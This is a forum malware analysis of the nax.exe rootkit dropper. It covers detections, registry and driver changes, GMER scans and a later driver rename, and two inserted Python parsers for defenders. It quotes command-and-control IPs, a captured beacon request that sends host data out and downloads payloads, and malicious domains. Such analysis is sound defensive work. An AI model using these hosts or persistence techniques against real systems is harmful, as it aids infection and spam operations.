Full Version: nax.exe (rootkit)
Kimberly

File details


Filename: nax.exe

File size: 20480 bytes
MD5: 5eb708dbb4e3391435494d0f434fbbfd
SHA1: 41b911427cc4cd8d088c91e34dea804ba8c4c67f
QUOTE
File nax.exe received on 11.27.2007 06:42:30 (CET)
AhnLab-V3 2007.11.27.0 2007.11.27 -
AntiVir 7.6.0.34 2007.11.26 -
Authentium 4.93.8 2007.11.24 -
Avast 4.7.1074.0 2007.11.25 -
AVG 7.5.0.503 2007.11.26 Downloader.Agent.14.C
BitDefender 7.2 2007.11.27 -
CAT-QuickHeal 9.00 2007.11.26 -
ClamAV 0.91.2 2007.11.26 -
DrWeb 4.44.0.09170 2007.11.26 BackDoor.Bulknet.97
eSafe 7.0.15.0 2007.11.21 -
eTrust-Vet 31.3.5329 2007.11.26 -
Ewido 4.0 2007.11.26 -
FileAdvisor 1 2007.11.27 -
Fortinet 3.14.0.0 2007.11.27 -
F-Prot 4.4.2.54 2007.11.27 -
F-Secure 6.70.13030.0 2007.11.27 -
Ikarus T3.1.1.12 2007.11.27 -
Kaspersky 7.0.0.125 2007.11.27 -
McAfee 5171 2007.11.26 -
Microsoft 1.3007 2007.11.27 TrojanDropper:Win32/Cutwail.H
NOD32v2 2687 2007.11.26 -
Norman 5.80.02 2007.11.26 -
Panda 9.0.0.4 2007.11.26 -
Prevx1 V2 2007.11.27 -
Rising 20.20.10.00 2007.11.27 -
Sophos 4.23.0 2007.11.27 Troj/Pushdo-Gen
Sunbelt 2.2.907.0 2007.11.27 -
Symantec 10 2007.11.27 -
TheHacker 6.2.9.142 2007.11.26 -
VBA32 3.12.2.5 2007.11.23 -
VirusBuster 4.3.26:9 2007.11.26 -
Webwasher-Gateway 6.0.1 2007.11.27 -

Technical details


Registry changes.
  • Adds a service called runtime2
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME "NextInstance"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "Class"
    Type: REG_SZ
    Data: LegacyDriver
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "ClassGUID"
    Type: REG_SZ
    Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "ConfigFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "DeviceDesc"
    Type: REG_SZ
    Data: runtime
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "Legacy"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "Service"
    Type: REG_SZ
    Data: runtime
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000\Control "*NewlyCreated*"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000\Control "ActiveService"
    Type: REG_SZ
    Data: runtime
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2 "NextInstance"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "Class"
    Type: REG_SZ
    Data: LegacyDriver
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "ClassGUID"
    Type: REG_SZ
    Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "ConfigFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "DeviceDesc"
    Type: REG_SZ
    Data: runtime2
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "Legacy"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "Service"
    Type: REG_SZ
    Data: runtime2
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000\Control "*NewlyCreated*"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000\Control "ActiveService"
    Type: REG_SZ
    Data: runtime2
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime "ImagePath"
    Type: REG_SZ
    Data: \??\C:\WINDOWS\System32\drivers\runtime.sys
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime "Start"
    Type: REG_DWORD
    Data: 03, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime "Type"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime\Enum "0"
    Type: REG_SZ
    Data: Root\LEGACY_RUNTIME\0000
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime\Enum "Count"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime\Enum "NextInstance"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
  • Adds entries to an existing, legitimate service. Addition depends on the OS version. Known services are Ip6Fw, NetDetect or Secdrv.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW "NextInstance"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "Class"
    Type: REG_SZ
    Data: LegacyDriver
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "ClassGUID"
    Type: REG_SZ
    Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "ConfigFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "DeviceDesc"
    Type: REG_SZ
    Data: IPv6 Windows Firewall Driver
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "Legacy"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "Service"
    Type: REG_SZ
    Data: Ip6Fw
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000\Control "*NewlyCreated*"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000\Control "ActiveService"
    Type: REG_SZ
    Data: Ip6Fw
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Ip6Fw\Enum "0"
    Type: REG_SZ
    Data: Root\LEGACY_IP6FW\0000
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Ip6Fw\Enum "Count"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Ip6Fw\Enum "NextInstance"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
  • Loads in Safe mode.
    The registry keys are hidden using rootkit technology as seen in the Gmer scan lower on the page.
File system changes.

QUOTE
C:\WINDOWS\system32\drivers\runtime.sys
C:\WINDOWS\system32\drivers\runtime2.sys
c:\WINDOWS\system32\0_exception.nls
c:\WINDOWS\Temp\startdrv.exe
Overwrites c:\WINDOWS\system32\drivers\ip6fw.sys

The file depends on the OS version; known files are:
  • %SYSTEM%\drivers\netdtect.sys
  • %SYSTEM%\drivers\ip6fw.sys
  • %SYSTEM%\drivers\secdrv.sys

Notes


The trojan loads "runtime2.sys" into kernel memory as a device driver. The installer is deleted after running. If an existing version is already detected, the trojan may drop the file as C:\WINDOWS\system32\drivers\runtime2.sy_
Replacement of the old driver is then requested by the installer.

c:\WINDOWS\Temp\startdrv.exe is an unpacked version of the trojan; it also hides files and registry keys relevant to the rootkit. It creates a startup entry to ensure that the driver loads on every boot, even in Safe Mode.
QUOTE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "startdrv"
Type: REG_SZ
Data: C:\WINDOWS\Temp\startdrv.exe
The driver performs a check at system startup and reinstates any of the registry entries if they have been removed.

The trojan also contains code for a downloader. The code is injected into a hidden Internet Explorer process. It usually attempts to update itself to the latest version.
It also sends a number of parameters to one of the servers below and tries to download a file.
QUOTE
66.246.252.213
67.18.114.98
74.52.122.130
208.66.194.221
208.66.194.241
66.246.252.215
66.246.72.173
The downloaded file can contain up to 3 executables. They are either saved to %temp%.exe and executed or directly injected into a new Internet Explorer process.
QUOTE
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: 62.72.1243.static.theplanet.com (67.18.114.98)
Transmission Control Protocol, Src Port: 1027 (1027), Dst Port: http (80), Seq: 1, Ack: 1, Len: 77
Hypertext Transfer Protocol
GET /s_80_0?hdd=202020202020202020202020202020202020202003&gen=0 HTTP/1.0\r\n
Request Method: GET
Request URI: /s_80_0?hdd=202020202020202020202020202020202020202003&gen=0
Request Version: HTTP/1.0
\r\n
The file was deleted after execution, but we can still see a trace of it in the MUI cache.
QUOTE
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\DOCUME~1\KLY\LOCALS~1\Temp\857913.exe"
Type: REG_SZ
Data: 857913
216.195.61.211 is then contacted to obtain a list of mailservers, webservers and other details.
The trojan has its own SMTP engine and sends out bulk emails to the obtained recipients.


Rootkit Scan


QUOTE
GMER 1.0.14.13626 - http://www.gmer.net
Rootkit scan 2007-11-27 18:21:24
Windows 5.1.2600 Service Pack 2


---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwDeleteValueKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwEnumerateKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwEnumerateValueKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwOpenKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwSetValueKey

---- Kernel code sections - GMER 1.0.14 ----

? C:\WINDOWS\System32\drivers\runtime.sys The system cannot find the file specified. !
? C:\WINDOWS\System32\drivers\runtime2.sys Access is denied.

---- Devices - GMER 1.0.14 ----

Device \FileSystem\Ntfs \Ntfs runtime2.sys
Device \FileSystem\Fastfat \FatCdrom runtime2.sys
Device \Driver\Tcpip \Device\Ip runtime.sys
Device \Driver\Tcpip \Device\Tcp runtime.sys
Device \Driver\Tcpip \Device\Udp runtime.sys
Device \Driver\Tcpip \Device\RawIp runtime.sys
Device \Driver\Tcpip \Device\IPMULTICAST runtime.sys
Device \FileSystem\Fastfat \Fat runtime2.sys

---- Processes - GMER 1.0.14 ----

Process C:\Program Files\Internet Explorer\iexplore.exe (*** hidden *** ) 484

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\drivers\runtime2.sys (*** hidden *** ) [SYSTEM] runtime2

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\runtime2.sys
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\runtime2.sys@ Driver
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\runtime2.sys
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\runtime2.sys@ Driver
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@ImagePath \SystemRoot\system32\drivers\runtime2.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@Start 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@DependOnGroup File System

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\drivers\runtime2.sys 34816 bytes

---- EOF - GMER 1.0.14 ----

Offending IP


203.117.111.102

QUOTE
IP Location - Singapore Starhubinternet
Reverse IP: 20 other sites hosted on this server

inetnum: 203.117.0.0 - 203.117.255.255
netname: STARHUBINTERNET-SG
descr: root
country: SG
admin-c: NS110-AP
tech-c: NS110-AP
mnt-by: MAINT-AS4657-AP
status: ALLOCATED NON-PORTABLE
source: APNIC

person: NOC SHI
nic-hdl: NS110-AP
address: 19 TaiSeng Drive
address: Singapore 535222
phone: +65 6825 7878
fax-no: +65 6821 6012
country: SG
mnt-by: MAINT-AS4657-AP
source: APNIC

Websites

1. 13fr.info
2. 1sense.info
3. 1speed.info
4. 2speed.info
5. Adminhost.info
6. D0r.info
7. Ddosmanager.org
8. Fastwiretransfer.info
9. Googletraff.info
10. Hacktrade.info
11. Hopana.info
12. Logartos.org
13. Miclosoft.org
14. My-loads.info
15. New-screensavers.com
16. Notsex.info
17. Renaissanceca.us
18. Super-proxy.info
19. Watch77.com
20. Xopfig.info
21. 23o.info

Some well-known malware domains live on the IP.
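Added example (not from the post or its author): a Python parser for the key / Type / Data registry listing quoted above. It decodes the little-endian REG_DWORD bytes and names the Start and Type constants, so a responder reading "Type 01 / Start 03" under Services\runtime sees a demand-start kernel driver, and it flags the Run entry that launches from the Temp directory. The sample dump is a constructed subset of the post's own listing; START_NAMES and TYPE_NAMES are the standard Windows service-control constants, and the Temp-directory rule is an assumed heuristic of mine, not something the post states.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: a subset of the registry listing quoted in the post,
# in the same "key "value" / Type: / Data:" layout (not a fresh dump).
SAMPLE_DUMP = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "Service"
Type: REG_SZ
Data: runtime
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime "ImagePath"
Type: REG_SZ
Data: \??\C:\WINDOWS\System32\drivers\runtime.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "startdrv"
Type: REG_SZ
Data: C:\WINDOWS\Temp\startdrv.exe
"""

KEY_LINE = re.compile(r'^(HKEY_\S+)\s+"([^"]*)"\s*$')
SERVICES_PREFIX = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services" + "\\"

# Meaning of the Start and Type DWORDs under a Services\<name> key
# (standard Windows service-control constants).
START_NAMES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START",
               2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
TYPE_NAMES = {0x1: "SERVICE_KERNEL_DRIVER", 0x2: "SERVICE_FILE_SYSTEM_DRIVER",
              0x10: "SERVICE_WIN32_OWN_PROCESS", 0x20: "SERVICE_WIN32_SHARE_PROCESS"}


def decode_dword(data: str) -> int:
    """'03, 00, 00, 00' lists the DWORD's bytes least-significant first."""
    raw = bytes(int(b, 16) for b in data.split(","))
    return int.from_bytes(raw, "little")


def parse_dump(text: str) -> List[Dict[str, object]]:
    """Turn the three-line key/Type/Data records into dicts; DWORDs become ints."""
    records: List[Dict[str, object]] = []
    current = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_LINE.match(line)
        if m:
            current = {"key": m.group(1), "name": m.group(2), "type": None, "data": None}
            records.append(current)
        elif current is not None and line.startswith("Type:"):
            current["type"] = line[len("Type:"):].strip()
        elif current is not None and line.startswith("Data:"):
            value = line[len("Data:"):].strip()
            current["data"] = decode_dword(value) if current["type"] == "REG_DWORD" else value
    return records


def services(records) -> Dict[str, Dict[str, object]]:
    """Collect the direct values of each Services\\<name> key and name the constants."""
    out: Dict[str, Dict[str, object]] = {}
    for r in records:
        key = str(r["key"])
        if not key.lower().startswith(SERVICES_PREFIX.lower()):
            continue
        rest = key[len(SERVICES_PREFIX):]
        if "\\" in rest:  # ...\runtime\Enum and other sub-keys are not service values
            continue
        out.setdefault(rest, {})[str(r["name"])] = r["data"]
    for svc in out.values():
        if isinstance(svc.get("Start"), int):
            svc["start_name"] = START_NAMES.get(svc["Start"], "unknown")
        if isinstance(svc.get("Type"), int):
            svc["type_name"] = TYPE_NAMES.get(svc["Type"], "unknown")
    return out


def run_entries(records) -> List[Tuple[str, str]]:
    """(value name, command) pairs under any ...\\CurrentVersion\\Run key."""
    return [(str(r["name"]), str(r["data"])) for r in records
            if str(r["key"]).lower().endswith(r"\currentversion\run")]


def findings(records) -> List[str]:
    """Plain-English flags a responder would want from this listing."""
    out = []
    for name, svc in services(records).items():
        if svc.get("type_name") == "SERVICE_KERNEL_DRIVER":
            out.append(f"kernel driver service '{name}' -> {svc.get('ImagePath')} ({svc.get('start_name')})")
    for name, cmd in run_entries(records):
        # Assumed heuristic: autostart commands living in a Temp directory are worth a look.
        if "\\temp\\" in cmd.lower():
            out.append(f"Run entry '{name}' launches from a Temp directory: {cmd}")
    return out


if __name__ == "__main__":
    for line in findings(parse_dump(SAMPLE_DUMP)):
        print(line)
```

Running the file prints the two flags for the sample; on a real listing, `services()` also surfaces any extra Services\<name> keys the dropper added, which is the quickest way to confirm that the driver names match what the scan reports.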
Kimberly
I wanted to check out something about nax.exe today and got a nifty surprise. I never saw anything other than runtime2 as file / service, and today I did notice ctl_w32 and ctl_w32.sys instead, although I did use the same dropper as in my initial post on a clean Virtual Machine ...

So the following question arises: Is this rootkit changing? Is it gonna become a random service like we often see with other infections?

Take a peek yourself; changes are listed in red.
QUOTE
GMER 1.0.14.13626 - http://www.gmer.net
Rootkit scan 2007-12-01 19:36:56
Windows 5.1.2600 Service Pack 2


---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\System32\drivers\ctl_w32.sys ZwDeleteValueKey
SSDT \??\C:\WINDOWS\System32\drivers\ctl_w32.sys ZwEnumerateKey
SSDT \??\C:\WINDOWS\System32\drivers\ctl_w32.sys ZwEnumerateValueKey
SSDT \??\C:\WINDOWS\System32\drivers\ctl_w32.sys ZwOpenKey
SSDT \??\C:\WINDOWS\System32\drivers\ctl_w32.sys ZwSetValueKey

---- Kernel code sections - GMER 1.0.14 ----

? C:\WINDOWS\System32\drivers\runtime.sys The system cannot find the file specified. !
? C:\WINDOWS\System32\drivers\ctl_w32.sys Access is denied.

---- Devices - GMER 1.0.14 ----

Device \FileSystem\Ntfs \Ntfs ctl_w32.sys
Device \FileSystem\Fastfat \FatCdrom ctl_w32.sys
Device \Driver\Tcpip \Device\Ip runtime.sys
Device \Driver\Tcpip \Device\Tcp runtime.sys
Device \Driver\Tcpip \Device\Udp runtime.sys
Device \Driver\Tcpip \Device\RawIp runtime.sys
Device \Driver\Tcpip \Device\IPMULTICAST runtime.sys
Device \FileSystem\Fastfat \Fat ctl_w32.sys

---- Processes - GMER 1.0.14 ----

Process C:\Program Files\Internet Explorer\iexplore.exe (*** hidden *** ) 1756

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\drivers\ctl_w32.sys (*** hidden *** ) [SYSTEM] ctl_w32

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ctl_w32.sys
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ctl_w32.sys@ Driver
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ctl_w32.sys
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ctl_w32.sys@ Driver
Reg HKLM\SYSTEM\CurrentControlSet\Services\ctl_w32
Reg HKLM\SYSTEM\CurrentControlSet\Services\ctl_w32@ImagePath \SystemRoot\system32\drivers\ctl_w32.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\ctl_w32@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ctl_w32@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ctl_w32@Start 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ctl_w32@DependOnGroup File System

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\drivers\ctl_w32.sys 34816 bytes

---- EOF - GMER 1.0.14 ----
Today the file did contact a different server.
QUOTE
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: 616959.ds.nac.net (66.246.252.215)
Transmission Control Protocol, Src Port: 1029 (1029), Dst Port: http (80), Seq: 1, Ack: 1, Len: 77
Hypertext Transfer Protocol
GET /s_80_0?hdd=202020202020202020202020202020202020202003&gen=0 HTTP/1.0\r\n
Request Method: GET
Request URI: /s_80_0?hdd=202020202020202020202020202020202020202003&gen=0
Request Version: HTTP/1.0
\r\n
The file was downloaded and deleted again, but we do find its trace in the MUI cache again.
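Added example, not from the thread: a Python parser for the GMER text output quoted in the first post and again in this one. It pulls out the SSDT hooks, device attachments, hidden process and service, and SafeBoot keys, explains from a defender's view what hooking each of the registry Zw functions lets the driver hide, and diffs two scans to show exactly which driver name changed between the 27 Nov and 1 Dec runs. The first scan text is a constructed excerpt of the posted scan; the second is derived from it by the substitutions the post reports (runtime2 to ctl_w32, and the hidden process id); REGISTRY_HOOK_EFFECT is my own description of the hooks' effect, not wording from GMER or the post.

```python
import ntpath
import re
from typing import Dict, List, Set

# Constructed excerpt of the GMER scan quoted in the first post (27 Nov),
# copied in GMER's own line layout; not a new scan.
SCAN_NOV27 = r"""
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwDeleteValueKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwEnumerateKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwEnumerateValueKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwOpenKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwSetValueKey
Device \FileSystem\Ntfs \Ntfs runtime2.sys
Device \Driver\Tcpip \Device\Tcp runtime.sys
Device \Driver\Tcpip \Device\Udp runtime.sys
Device \FileSystem\Fastfat \Fat runtime2.sys
Process C:\Program Files\Internet Explorer\iexplore.exe (*** hidden *** ) 484
Service C:\WINDOWS\system32\drivers\runtime2.sys (*** hidden *** ) [SYSTEM] runtime2
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\runtime2.sys
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\runtime2.sys@ Driver
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\runtime2.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@Start 1
"""
# The 1 Dec scan in the second post differs only in the driver name and the
# hidden process id, so it is derived here by substitution (constructed).
SCAN_DEC01 = SCAN_NOV27.replace("runtime2", "ctl_w32").replace(" 484", " 1756")

SSDT_RE = re.compile(r"^SSDT\s+(\S+)\s+(Zw\w+)\s*$")
DEVICE_RE = re.compile(r"^Device\s+(\S+)\s+(\S+)\s+(\S+)\s*$")
HIDDEN_PROC_RE = re.compile(r"^Process\s+(.+?)\s+\(\*\*\* hidden \*\*\*\s*\)\s+(\d+)\s*$")
HIDDEN_SVC_RE = re.compile(r"^Service\s+(.+?)\s+\(\*\*\* hidden \*\*\*\s*\)\s+\[(\w+)\]\s+(\S+)\s*$")

# What hooking each registry syscall buys a rootkit (defender's reading of
# general Windows kernel behaviour; not taken from the post).
REGISTRY_HOOK_EFFECT = {
    "ZwEnumerateKey": "hide subkeys from enumeration (regedit, autorun listers, scanners)",
    "ZwEnumerateValueKey": "hide values from enumeration",
    "ZwOpenKey": "deny or redirect opens of the protected keys",
    "ZwSetValueKey": "block changes to protected values",
    "ZwDeleteValueKey": "block deletion of protected values",
}


def parse_gmer(text: str) -> Dict[str, list]:
    """Extract the sections a responder cares about from GMER's text output."""
    scan: Dict[str, list] = {"ssdt": [], "devices": [], "hidden_processes": [],
                             "hidden_services": [], "safeboot_keys": []}
    for raw in text.splitlines():
        line = raw.strip()
        m = SSDT_RE.match(line)
        if m:
            scan["ssdt"].append((m.group(1), m.group(2)))   # (hooking module, syscall)
            continue
        m = DEVICE_RE.match(line)
        if m:
            scan["devices"].append(m.groups())              # (driver object, device, module)
            continue
        m = HIDDEN_PROC_RE.match(line)
        if m:
            scan["hidden_processes"].append((m.group(1), int(m.group(2))))
            continue
        m = HIDDEN_SVC_RE.match(line)
        if m:
            scan["hidden_services"].append((m.group(1), m.group(3)))
            continue
        # SafeBoot\Minimal and SafeBoot\Network keys make the driver load in Safe Mode;
        # the "@ Driver" lines are the keys' default values, so skip them.
        if line.startswith("Reg ") and "\\SafeBoot\\" in line and "@" not in line:
            scan["safeboot_keys"].append(line[4:])
    return scan


def hooking_modules(scan) -> Set[str]:
    """Basenames of every module that owns an SSDT hook."""
    return {ntpath.basename(path) for path, _ in scan["ssdt"]}


def registry_hiding_report(scan) -> Dict[str, List[str]]:
    """Per hooking module, what its registry hooks let it hide or protect."""
    report: Dict[str, List[str]] = {}
    for path, func in scan["ssdt"]:
        if func in REGISTRY_HOOK_EFFECT:
            report.setdefault(ntpath.basename(path), []).append(f"{func}: {REGISTRY_HOOK_EFFECT[func]}")
    return report


def attached_modules(scan) -> Dict[str, Set[str]]:
    """Which device objects each module has attached to (network vs. file system)."""
    out: Dict[str, Set[str]] = {}
    for _driver_obj, device, module in scan["devices"]:
        out.setdefault(module, set()).add(device)
    return out


def diff_scans(old, new) -> Dict[str, Set[str]]:
    """Modules that stopped or started hooking the SSDT between two scans."""
    a, b = hooking_modules(old), hooking_modules(new)
    return {"removed": a - b, "added": b - a}


if __name__ == "__main__":
    first, second = parse_gmer(SCAN_NOV27), parse_gmer(SCAN_DEC01)
    print("hooking modules changed:", diff_scans(first, second))
    for module, effects in registry_hiding_report(second).items():
        print(module, "->", "; ".join(effects))
```

The diff shows the same set of five registry hooks moving from runtime2.sys to ctl_w32.sys while runtime.sys stays attached to the TCP/IP devices, which is the cleanest way to tell a renamed component from a genuinely different one when comparing scans across reinfections.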